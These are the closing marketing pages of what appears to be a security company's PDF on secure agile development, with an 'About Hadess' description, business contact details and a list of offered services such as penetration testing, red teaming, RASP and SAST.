HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
79. HADESS | SECURE AGILE DEVELOPMENT
About Hadess
Savior of your Business to combat cyber threats
Hadess performs offensive cybersecurity services
through infrastructures and software that
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized
our activities around the prevention of corporate,
industrial, and laboratory cyber threats.
Contact Us
To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
Email:
Marketing@hadess.io
Phone No.
+989362181112
Company No.
+982128427515
+982177873383
Website:
www.hadess.io
hadess_security
80. HADESS | SECURE AGILE DEVELOPMENT
Hadess
Products and Services
Fully assess your organization’s threat detection and response
capabilities with a simulated cyber-attack.
Penetration Testing | PROTECTION PRO
Fully assess your organization’s threat detection and response
capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO
Identifying and helping to address hidden weaknesses in
your organization’s security.
RASP | Protect Applications and APIs Anywhere
Identifying and helping to address hidden weaknesses in
your Applications.
SAST | Audit Your Products
Identifying and helping to address hidden weaknesses in
your organization’s security
PWN Z1 | Audit Your PPP